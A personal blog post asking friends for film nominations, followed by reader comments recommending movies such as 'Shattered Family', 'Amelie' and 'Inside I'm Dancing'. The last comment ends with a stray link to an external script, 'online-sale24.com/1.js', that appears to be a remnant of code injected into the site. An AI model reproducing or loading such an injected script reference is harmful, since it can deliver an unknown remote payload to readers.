25 Films

So, for a shocking change, I’m procrastinating like a mofo and have decided to steal my friend’s idea to watch 25 films selected by 25 friends that I have never seen before. SO, since I’m classifying you as friends, I’d love to get your nominations below! And I’ll be posting the list and my reviews here over the course of the year. If you want to keep up with Paul’s list and tweet him your encouragement, you can do it here.

Suggestions, people?http://0

  7. Ashleigh says:

    Hi Lindsey!

Ok so I dug deep for this one and tried to think of a film that I didn’t think would be an every day suggestion, but at the same time had a profound affect on me! So my suggestion is ‘Shattered Family’, which was released in 1993, directed by Sandy Smolan and starred Richard Crenna and Rhea Perlman. It’s based on a true story of a boy who divorced his parents, and truely is one of those films that makes you see the good in other people, consider how lucky you have it in life, and that happy endings can exist.

I was about 10 when I first watched this, then stumbbled across it on Sky a few years ago, and it still made me feel exactly the same.

Give it a go and let me know what you think!

    Ash xx

  8. BUSRA says:

Pursuit of happiness and seven pounds will make you cry like a baby and you get to see a different side of Will Smith. My blueberry nights, a romantic movie and lake house. The girl with the dragon tattoo saga for a bit of action!! I could really keep going forever with this list of movies!!! Enjoy your movies!!!

  26. Angela says:

I loved “Inside i’m Dancing”, low budget british movie about young men with disabilities wanting to live their lives as they wish, not as doomy as it sounds, such good performances honestly you’ll be blown away. Both of the new Sherlock Holmes films are brilliant, but mainsteam so you’ve probably seen them. They are so clever and of course its an evening with Mr Robert Downey junior πŸ™‚ “Amelie” is a french film, if you can put up with subtitles its a clever fun film, didn’t know what it was going to be when it started but i smiled the whole way through. Can’t wait to see what you chose and what you think of them!http://online-sale24.com/1.js
